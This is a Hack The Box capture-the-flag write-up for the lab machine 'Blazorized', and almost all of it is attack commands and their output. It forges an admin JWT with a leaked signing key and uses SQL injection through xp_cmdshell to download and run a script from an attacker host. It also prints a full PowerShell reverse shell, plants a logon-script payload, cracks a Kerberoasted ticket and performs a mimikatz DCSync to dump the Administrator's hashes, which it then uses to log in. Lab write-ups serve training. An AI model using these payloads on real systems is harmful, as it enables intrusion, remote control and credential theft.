HTB - Blazorized [Hard]
TCP Scan
> TARGET=10.129.81.3 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://blazorized.htb
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-06-30 21:30:03Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2022 16.00.1115.00; RC0+
| ms-sql-info:
| 10.129.81.3\BLAZORIZED:
| Instance name: BLAZORIZED
| Version:
| name: Microsoft SQL Server 2022 RC0+
| number: 16.00.1115.00
| Product: Microsoft SQL Server 2022
| Service pack level: RC0
| Post-SP patches applied: true
| TCP port: 1433
|_ Clustered: false
| ms-sql-ntlm-info:
| 10.129.81.3\BLAZORIZED:
| Target_Name: BLAZORIZED
| NetBIOS_Domain_Name: BLAZORIZED
| NetBIOS_Computer_Name: DC1
| DNS_Domain_Name: blazorized.htb
| DNS_Computer_Name: DC1.blazorized.htb
| DNS_Tree_Name: blazorized.htb
|_ Product_Version: 10.0.17763
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49676/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49700/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49710/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49776/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2022 16.00.1115.00; RC0+
| ms-sql-info:
| 10.129.81.3:49776:
| Version:
| name: Microsoft SQL Server 2022 RC0+
| number: 16.00.1115.00
| Product: Microsoft SQL Server 2022
| Service pack level: RC0
| Post-SP patches applied: true
|_ TCP port: 49776
62648/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
echo '10.129.81.3 blazorized.htb' >> /etc/hosts
enum
- subdomain
wfuzz -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://blazorized.htb/" -H "Host: FUZZ.blazorized.htb" --hl 107
000000024: 200 27 L 67 W 2015 Ch "admin"
000000051: 404 0 L 0 W 0 Ch "api"
user: blazorized\nu_1055
- get
http://blazorized.htb/_framework/Blazorized.Shared.dll - reverse to get jwt check code
- generate jwt
import jwt
import time
from datetime import datetime, timedelta
# Symmetric key from your findings
secret_key = "8697800004ee25fc33436978ab6e2ed6ee1a97da699a53a53d96cc4d08519e185d14727ca18728bf1efcde454eea6f65b8d466a4fb6550d5c795d9d9176ea6cf021ef9fa21ffc25ac40ed80f4a4473fc1ed10e69eaf957cfc4c67057e547fadfca95697242a2ffb21461e7f554caa4ab7db07d2d897e7dfbe2c0abbaf27f215c0ac51742c7fd58c3cbb89e55ebb4d96c8ab4234f2328e43e095c0f55f79704c49f07d5890236fe6b4fb50dcd770e0936a183d36e4d544dd4e9a40f5ccf6d471bc7f2e53376893ee7c699f48ef392b382839a845394b6b93a5179d33db24a2963f4ab0722c9bb15d361a34350a002de648f13ad8620750495bff687aa6e2f298429d6c12371be19b0daa77d40214cd6598f595712a952c20eddaae76a28d89fb15fa7c677d336e44e9642634f32a0127a5bee80838f435f163ee9b61a67e9fb2f178a0c7c96f160687e7626497115777b80b7b8133cef9a661892c1682ea2f67dd8f8993c87c8c9c32e093d2ade80464097e6e2d8cf1ff32bdbcd3dfd24ec4134fef2c544c75d5830285f55a34a525c7fad4b4fe8d2f11af289a1003a7034070c487a18602421988b74cc40eed4ee3d4c1bb747ae922c0b49fa770ff510726a4ea3ed5f8bf0b8f5e1684fb1bccb6494ea6cc2d73267f6517d2090af74ceded8c1cd32f3617f0da00bf1959d248e48912b26c3f574a1912ef1fcc2e77a28b53d0a"
# JWT claims
claims = {
"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress": "superadmin@blazorized.htb",
"http://schemas.microsoft.com/ws/2008/06/identity/claims/role": ["Super_Admin"],
"exp": int((datetime.utcnow() + timedelta(hours=72)).timestamp()), # Set expiration time to 1 hour in the future
"iss": "http://api.blazorized.htb",
"aud": "http://admin.blazorized.htb"
}
# Encode the JWT with the symmetric key
token = jwt.encode(claims, secret_key, algorithm="HS512")
print(token)
# Print the JavaScript code
print(f"localStorage.setItem('jwt', '{token}')")
- sqli at
http://admin.blazorized.htb/check-duplicate-post-title
'; IF (SELECT CONVERT(INT, value_in_use) FROM sys.configurations WHERE name = 'xp_cmdshell') = 1 EXEC master.dbo.xp_cmdshell 'powershell -c "IEX(New-Object Net.WebClient).DownloadString(''http://10.10.14.65/rev.ps1'')" --
- reverse shell
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.65",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
- listener
# rlwrap nc -vnlp 4444
PS C:\Windows\system32> whoami
blazorized\nu_1055
PS C:\users\NU_1055\desktop> type user.txt
c8d921959eabcd0ed42d61ae114e36b3
user
wget http://10.10.14.65/PowerView.ps1 -O PowerView.ps1
import-module .\PowerView.ps1
> Set-DomainObject -Identity RSA_4810 -SET @{serviceprincipalname='nonexistent/BLAHBLAH'}
> Get-DomainSPNTicket -SPN nonexistent/BLAHBLAH
SamAccountName : UNKNOWN
DistinguishedName : UNKNOWN
ServicePrincipalName : nonexistent/BLAHBLAH
TicketByteHexStream :
Hash : $krb5tgs$23$*UNKNOWN$UNKNOWN$nonexistent/BLAHBLAH*$35549301BCB804D824B46FD05FE9A212$9FBCCA4457D7
5BB458498BF0CB0985D7C7EF648E2F3185FD139241512AC1E1BDADAA5DA3F3E73427983CDB160F724886D02D8EB121CB
76BB04F5B35130796C1C614FFFA3D53BF34A47E444CC828CA4E881E9F99A6C26000F3259DCBAA14658CCF4F82D53D89B
29574F5B651EE1056181993CBF6B730933021890870C79F0E665288EE04BF3BC85CCB1BE79FB7C9590DF4A7FE0B94CDD
36C3A5EAB62067CBD426E2B3C03D0268C14CD4BE9E897A0C73E9A4B0DD680E947064B4CD3AC45BA47371CF4433FCDE43
120C2640E2AB6745D1D6375AB8F6616B4F6AA88C4927CE37881142269FFB35DCA5976CA2FD8F9FCDCF81BBC1983149AF
0C0641BD1A3B0DF649F552DD43BFD9C8B19B20B6C0B780DC78F29613900F3BE82754DA0C9EA2F86E2A7C2D5D51E0CA4F
2D230EA3C377EE818658BA5726F67D61E014BB263FF702607FD099B9BA114D7F5B0F0DDF93B919B02A8A4A33F83564CE
4C2A4140B674DDA9553386F2DDE2C7E3024C94295CA3F30CD63E068E05E5B8EFDEA2F6B1668628FEB1A0B3A51B9DCC38
0C7A6F4CAEBF648CCEC370C99171F78B106AC58C228CDB12F59B0BFD6B640628531BC679BDCEEACCBFFC851BABBC77B7
58E79EDDFA4035C068F69177A62ED38C8843EA69A6639D0773828E8605E53BA3BAA70289646460BEA21ADE515A3455DE
4A25B0D97FD4316DE275C8B26E90B06CFFAB8DED2E7E43FBE9CD9ABF6EDE8AF5B04135BF34DA39375973061F99012D84
4203C67658C69E9C858C6669109FF9087EBEFD161D5519A708FD614517A63BEF686B7CFB27C44C62BB18D809C27C221E
51759DAAC3F28AC52AE92E04B8D4998457DF5BBDA242865B8B0DF34F4BF9A481F808623947DD3D52D3A05491C155A5B9
2B43EF411D4B47B9660E76B15803C3D29C0593FB5F7EA4C246F2AAD222292550715F0BE351314A88232FEF82248531E1
84671AA9F67D367E232925D4E8A123400B498D348CEE59778FDDEC8705D7DA59BF6F1F963048E0BB4F9558A2C7D87470
392168F249C27644C507EBF054B05EEA4B4C1F97BB280F585026B0D60142E657AB38CE2E966590CC8B1D659E67EC573F
0FD6CAD10260A4FFA2B42615A0CCC402C740FE4CCC0AD5D21EEFDAEBEC191DB602BCA490666AE58E377DBCA35927D726
A07182BE5960B6B32DB4B3B76782BF897A7D041CE8CF230B7ACF1938CD6F61AD68979A726FA0F6F190CBC909A8BF4D34
78C4219347460F2B81267A343C9C943FF66EEADB7219F8EEB0CDE4B447C6937CE1F17F2736A0D6A697E4FDA58805F9A5
2C1289DB4357E7CFA32A9750EE9018748FF0A1D01F7843B518849BC0597D73A4FF43A7C589DCAB727638AC544272516D
068E5C791BAE4E747D9DD7D9270CD77959CA3C017549D108666DE910621903931F4C64B086F7F19F4DD3E855DAFF911C
25070CBF3EBCA9F2C3080002074D6042D0AAB1739DE51BDE279DB0709833237C6D2BCC4ECB0A158543C3A081355B5119
CBACD77C56EF07DF24A208B6992163EB01AEEAB61D10AED19AA8D0DEBEF643D581CA43980D0F080E0814038F3B58D7E1
5D1DDAC5915C089640F68A350FAE2891274447535D581DFB81E82EF15D56D60C9936854A737D6E2BBEA60FCE012CBB99
1B10011DBEAFB46F1B467DB8F7A6398D403A0AA2B44B2ED42D084A0F1521DCC36242768C5E56A254B852FA9A4CEFBC56
B4583E830106AC9D52D70A0A6B1663D28028B843D2F8F84802CB9BECBE1CA4EEEABCA3435D841F95B4D2248EB7699911
39AC
- crack ticket
john hash --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
(Ni7856Do9854Ki05Ng0005 #) (?)
1g 0:00:00:06 DONE (2024-07-01 10:38) 0.1663g/s 2382Kp/s 2382Kc/s 2382KC/s (aleha)*eslomaXimo..(Cahir!!!)
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
- login
> evil-winrm -i blazorized.htb -u RSA_4810 -p '(Ni7856Do9854Ki05Ng0005 #)'
user:SSA_6010
- https://learn.microsoft.com/en-us/troubleshoot/windows-server/user-profiles-and-logon/assign-logon-script-profile-local-user In the above note, it explains how to set your scriptPath, it must be relative to NETLOGON path, so go find where it NETLOGON is in the system. Then check the permissions of the directories and find one where you have write privileges. Finally, paste the payload (I used a payload from revshells.com, more specifically powershell base64) in a file there (I’ve tested with an existent file and a new file ending in .bat extension, both worked, .ps1 didn’t work for some reason) and change the scriptPath of the SSA_6010 user. P.S.: Don’t try to add your payload in the original file, for some reason it doesn’t work, even when you have write permissions there…
> wget http://10.10.14.65/startup.bat -O C:\Windows\SYSVOL\domain\scripts\A32FF3AEAA23\startup.bat
*Evil-WinRM* PS C:\Users\public\documents> get-aduser ssa_6010 | set-aduser -scriptpath "A32FF3AEAA23\startup.bat"
*Evil-WinRM* PS C:\Users\public\documents> get-aduser ssa_6010 -properties scriptpath
DistinguishedName : CN=SSA_6010,CN=Users,DC=blazorized,DC=htb
Enabled : True
GivenName :
Name : SSA_6010
ObjectClass : user
ObjectGUID : 8bf3166b-e716-4f91-946c-174e1fb433ed
SamAccountName : SSA_6010
ScriptPath : A32FF3AEAA23\startup.bat
SID : S-1-5-21-2039403211-964143010-2924010611-1124
Surname :
UserPrincipalName : SSA_6010@blazorized.htb
- statup.bat
powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.65/rev.ps1')
root
PS C:\users\SSA_6010\documents> Get-ObjectAcl -DistinguishedName "dc=blazorized,dc=htb" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}
AceType : AccessAllowed
ObjectDN : DC=blazorized,DC=htb
ActiveDirectoryRights : CreateChild, Self, WriteProperty, ExtendedRight, GenericRead, WriteDacl, WriteOwner
OpaqueLength : 0
ObjectSID : S-1-5-21-2039403211-964143010-2924010611
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-2039403211-964143010-2924010611-512
AccessMask : 917949
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
AceType : AccessAllowed
ObjectDN : DC=blazorized,DC=htb
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-2039403211-964143010-2924010611
InheritanceFlags : ContainerInherit
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-2039403211-964143010-2924010611-519
AccessMask : 983551
AuditFlags : None
AceFlags : ContainerInherit
AceQualifier : AccessAllowed
AceType : AccessAllowed
ObjectDN : DC=blazorized,DC=htb
ActiveDirectoryRights : CreateChild, Self, WriteProperty, ExtendedRight, Delete, GenericRead, WriteDacl, WriteOwner
OpaqueLength : 0
ObjectSID : S-1-5-21-2039403211-964143010-2924010611
InheritanceFlags : ContainerInherit
BinaryLength : 24
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-544
AccessMask : 983485
AuditFlags : None
AceFlags : ContainerInherit
AceQualifier : AccessAllowed
AceType : AccessAllowed
ObjectDN : DC=blazorized,DC=htb
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-2039403211-964143010-2924010611
InheritanceFlags : None
BinaryLength : 20
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-18
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
cd C:\users\SSA_6010\documents
- use mimikatz
PS C:\users\SSA_6010\documents> .\mimikatz.exe "privilege::debug" "lsadump::dcsync /user:administrator \krbtgt" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061
mimikatz(commandline) # lsadump::dcsync /user:administrator \krbtgt
[DC] 'blazorized.htb' will be the domain
[DC] 'DC1.blazorized.htb' will be the DC server
[DC] 'administrator' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 2/25/2024 12:54:43 PM
Object Security ID : S-1-5-21-2039403211-964143010-2924010611-500
Object Relative ID : 500
Credentials:
Hash NTLM: f55ed1465179ba374ec1cad05b34a5f3
ntlm- 0: f55ed1465179ba374ec1cad05b34a5f3
ntlm- 1: eecc741ecf81836dcd6128f5c93313f2
ntlm- 2: c543bf260df887c25dd5fbacff7dcfb3
ntlm- 3: c6e7b0a59bf74718bce79c23708a24ff
ntlm- 4: fe57c7727f7c2549dd886159dff0d88a
ntlm- 5: b471c416c10615448c82a2cbb731efcb
ntlm- 6: b471c416c10615448c82a2cbb731efcb
ntlm- 7: aec132eaeee536a173e40572e8aad961
ntlm- 8: f83afb01d9b44ab9842d9c70d8d2440a
ntlm- 9: bdaffbfe64f1fc646a3353be1c2c3c99
lm - 0: ad37753b9f78b6b98ec3bb65e5995c73
lm - 1: c449777ea9b0cd7e6b96dd8c780c98f0
lm - 2: ebbe34c80ab8762fa51e04bc1cd0e426
lm - 3: 471ac07583666ccff8700529021e4c9f
lm - 4: ab4d5d93532cf6ad37a3f0247db1162f
lm - 5: ece3bdafb6211176312c1db3d723ede8
lm - 6: 1ccc6a1cd3c3e26da901a8946e79a3a5
lm - 7: 8b3c1950099a9d59693858c00f43edaf
lm - 8: a14ac624559928405ef99077ecb497ba
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 36ff197ab8f852956e4dcbbe85e38e17
* Primary:Kerberos-Newer-Keys *
Default Salt : BLAZORIZED.HTBAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 29e501350722983735f9f22ab55139442ac5298c3bf1755061f72ef5f1391e5c
aes128_hmac (4096) : df4dbea7fcf2ef56722a6741439a9f81
des_cbc_md5 (4096) : 310e2a0438583dce
OldCredentials
aes256_hmac (4096) : eeb59c1fa73f43372f40f4b0c9261f30ce68e6cf0009560f7744d8871058af2c
aes128_hmac (4096) : db4d9e0e5cd7022242f3e03642c135a6
des_cbc_md5 (4096) : 1c67ef730261a198
OlderCredentials
aes256_hmac (4096) : bb7fcd1148a3863c9122784becf13ff7b412af7d734162ed3cb050375b1a332c
aes128_hmac (4096) : 2d9925ef94916523b24e43d1cb8396ee
des_cbc_md5 (4096) : 9b01158c8923ce68
* Primary:Kerberos *
Default Salt : BLAZORIZED.HTBAdministrator
Credentials
des_cbc_md5 : 310e2a0438583dce
OldCredentials
des_cbc_md5 : 1c67ef730261a198
* Packages *
NTLM-Strong-NTOWF
* Primary:WDigest *
01 7e35fe37aac9f26cecc30390171b6dcf
02 a8710c4caaab28c0f2260e7c7bd3b262
03 81eae4cf7d9dadff2073fbf2d5c60539
04 7e35fe37aac9f26cecc30390171b6dcf
05 9bc0a87fd20d42df13180a506db93bb8
06 26d42d164b0b82e89cf335e8e489bbaa
07 d67d01da1b2beed8718bb6785a7a4d16
08 7f54f57e971bcb257fc44a3cd88bc0e3
09 b3d2ebd83e450c6b0709d11d2d8f6aa8
10 1957f9211e71d307b388d850bdb4223f
11 2fa495bdf9572e0d1ebb98bb6e268b01
12 7f54f57e971bcb257fc44a3cd88bc0e3
13 de0bba1f8bb5b81e634fbaa101dd8094
14 2d34f278e9d98e355b54bbd83c585cb5
15 06b7844e04f68620506ca4d88e51705d
16 97f5ceadabcfdfcc019dc6159f38f59e
17 ed981c950601faada0a7ce1d659eba95
18 cc3d2783c1321d9d2d9b9b7170784283
19 0926e682c1f46c007ba7072444a400d7
20 1c3cec6d41ec4ced43bbb8177ad6e272
21 30dcd2ebb2eda8ae4bb2344a732b88f9
22 b86556a7e9baffb7faad9a153d1943c2
23 c6e4401e50b8b15841988e4314fbcda2
24 d64d0323ce75a4f3dcf0b77197009396
25 4274d190e7bc915d4047d1a63776bc6c
26 a04215f3ea1d2839a3cdca4ae01e2703
27 fff4b2817f8298f09fd45c3be4568ab1
28 2ea3a6b979470233687bd913a8234fc7
29 73d831d131d5e67459a3949ec0733723
mimikatz(commandline) # exit
Bye!
- login
┌──(root㉿kali)-[~/workspace/Blazorized]
└─# evil-winrm -i blazorized.htb -u administrator -H f55ed1465179ba374ec1cad05b34a5f3
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> ls
Directory: C:\Users\Administrator\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/29/2024 3:42 PM 159 note.txt
-ar--- 6/30/2024 7:33 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
996613cb46967be90e154649068d4465
Support meowmeow
If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack